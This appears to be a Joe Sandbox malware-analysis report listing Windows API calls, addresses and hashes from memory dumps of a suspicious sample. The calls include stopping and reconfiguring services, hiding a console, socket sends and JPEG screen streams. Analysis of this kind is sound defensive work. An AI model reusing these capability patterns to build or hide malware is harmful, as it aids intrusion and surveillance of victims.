                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
                                                                                                                                                                                                                              • EnumDisplayDevicesW.USER32(?), ref: 00418652
                                                                                                                                                                                                                              • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
                                                                                                                                                                                                                              • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1432082543-0
                                                                                                                                                                                                                              • Opcode ID: 566b1ffbc59c15345c10d2f0b09a2561ed6cab49562c48eef29e794647955bfe
                                                                                                                                                                                                                              • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 566b1ffbc59c15345c10d2f0b09a2561ed6cab49562c48eef29e794647955bfe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2956720200-0
                                                                                                                                                                                                                              • Opcode ID: 5723638a63ca1f589c1207b8dba9709279fda0b950c9cb3698e3289e166d6b19
                                                                                                                                                                                                                              • Instruction ID: defcedab57186357115b98b4a4cc344408793f3c2f2574c74d634edf258c7d09
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5723638a63ca1f589c1207b8dba9709279fda0b950c9cb3698e3289e166d6b19
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 862153715043016BC600FB75CD4ACAF77A8ABC5715F400A3EF911931E6DB38D604C756
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 00419DFC
                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 00419E10
                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00419E1D
                                                                                                                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419E52
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Service$Open$ChangeCloseConfigHandleManager
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 110783151-0
                                                                                                                                                                                                                              • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                                                                                                                                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                              • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                              • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                                                                                                                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                                                                                                                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                              • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0042EAD7,00000000,00000000,?,004471B7,0042EAD7,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,004471B7,0042EAD7,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,0042EAD7,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                              • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                              • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4067487056-0
                                                                                                                                                                                                                              • Opcode ID: 7e766a7ea71f6337ac7c99c6c4a9d326f92e5ce4ebb09789323ae5cba05f4821
                                                                                                                                                                                                                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e766a7ea71f6337ac7c99c6c4a9d326f92e5ce4ebb09789323ae5cba05f4821
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020), ref: 00419C2F
                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020), ref: 00419C43
                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00419C50
                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?), ref: 00419C5F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Service$Open$CloseControlHandleManager
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1243734080-0
                                                                                                                                                                                                                              • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                                                                                                                                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 00419D31
                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 00419D45
                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00419D52
                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000002,?), ref: 00419D61
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Service$Open$CloseControlHandleManager
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1243734080-0
                                                                                                                                                                                                                              • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                                                                                                                                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 00419D96
                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 00419DAA
                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00419DB7
                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?), ref: 00419DC6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Service$Open$CloseControlHandleManager
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1243734080-0
                                                                                                                                                                                                                              • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                                                                                                                                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2993684571-0
                                                                                                                                                                                                                              • Opcode ID: 5b270a1fd4c67bfd4b89c16ffbf6d9f7949541992c2da4b457e6ae0fad272897
                                                                                                                                                                                                                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b270a1fd4c67bfd4b89c16ffbf6d9f7949541992c2da4b457e6ae0fad272897
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3024135584-0
                                                                                                                                                                                                                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                              • Opcode ID: a42e74afbb9c66d40b29481906f3c26bc17d12d9b13d20fed04b334de64701d1
                                                                                                                                                                                                                              • Instruction ID: 71202e7ba6f1ee6fb9a6349d29e5f15154cd5861fb596e3339df48b3b334a313
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a42e74afbb9c66d40b29481906f3c26bc17d12d9b13d20fed04b334de64701d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F29119308841489BCF10CF69C4406EE7BB1AF59324F14A25BECE1A7381D27C99228B5B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                              • String ID: $fD
                                                                                                                                                                                                                              • API String ID: 1807457897-3092946448
                                                                                                                                                                                                                              • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                              • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                                                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,00457288,00000000,?,?,?,?,00465900,0040C07B,004661E4), ref: 0041AB5F
                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                                              • String ID: 8>G
                                                                                                                                                                                                                              • API String ID: 368326130-2084872820
                                                                                                                                                                                                                              • Opcode ID: 98bb010f6fc0701c23f22af805dff0ff69e8ab048de325fed4ba88c0b986132d
                                                                                                                                                                                                                              • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98bb010f6fc0701c23f22af805dff0ff69e8ab048de325fed4ba88c0b986132d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateStream
                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                              • API String ID: 1369699375-3785015651
                                                                                                                                                                                                                              • Opcode ID: f68304ef7b417aefd933b86cb656289661524de42ad516d4c4f2b0040af23821
                                                                                                                                                                                                                              • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
